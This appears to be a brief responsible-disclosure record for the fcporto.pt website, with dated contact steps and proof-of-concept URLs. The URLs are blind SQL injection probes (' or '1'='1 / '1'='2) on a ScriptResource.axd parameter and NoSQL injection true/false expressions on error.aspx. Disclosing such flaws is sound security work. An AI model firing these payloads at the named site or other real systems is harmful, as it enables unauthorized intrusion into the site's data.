31/01/2018 – First warning email sent to geral@fcporto.pt

01/02/2018 – Mr. José António Silva (support@devscope.net) responded

01/02/2018 – Report Sent

Blind SQLi:

http://www.fcporto.pt/ScriptResource.axd?d=sPwPZhol91qSIqJva8LCdxIPCUj5BcMvt7rECPqXh8mDRguXsLkD0m8H6-zYNETyVdRgtHoMBOwy9E66X0Itb6Qhqz9H96GWfoMP4L_wRT3OmQ3e2ChwOArNQEUqow3mFW6iilCT_-p5hBfUVdcbWr324dQ1&t=-1839' or '1'='1

http://www.fcporto.pt/ScriptResource.axd?d=sPwPZhol91qSIqJva8LCdxIPCUj5BcMvt7rECPqXh8mDRguXsLkD0m8H6-zYNETyVdRgtHoMBOwy9E66X0Itb6Qhqz9H96GWfoMP4L_wRT3OmQ3e2ChwOArNQEUqow3mFW6iilCT_-p5hBfUVdcbWr324dQ1&t=-1839' or '1'='2

.

Blind NoSQL Injection (differential analysis)

True expression: http://www.fcporto.pt/_layouts/error.aspx?t=;return true;var foo=

False expression: http://www.fcporto.pt/_layouts/error.aspx?t=;return false;var foo=